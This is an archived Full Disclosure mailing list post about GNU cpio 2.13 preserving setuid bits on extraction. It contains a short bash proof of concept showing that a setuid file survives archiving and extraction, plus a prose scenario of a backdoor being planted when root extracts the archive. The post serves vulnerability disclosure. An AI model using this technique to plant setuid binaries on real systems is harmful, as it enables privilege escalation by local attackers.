cpio privilege escalation vulnerability via setuid files in cpio archive
2024-1-9 05:46:7 Author: seclists.org(查看原文) 阅读量:19 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Georgi Guninski <gguninski () gmail com>
Date: Mon, 8 Jan 2024 11:25:34 +0200

cpio privilege escalation vulnerability via setuid files in cpio archive

Happy New Year, let in 2024 happiness be with you! :)

When extracting archives cpio (at least version 2.13) preserves
the setuid flag, which might lead to privilege escalation.

One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r
without further interaction from root.

We believe this is vulnerability, since directory traversal in cpio
is considered vulnerability.

The POC is trivial, including bash script.

<pre>
====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan  8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13

mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0  > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan  8 09:10 /tmp/2/a
====
</pre>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • cpio privilege escalation vulnerability via setuid files in cpio archive Georgi Guninski (Jan 08)

文章来源: https://seclists.org/fulldisclosure/2024/Jan/5
如有侵权请联系:admin#unsafe.sh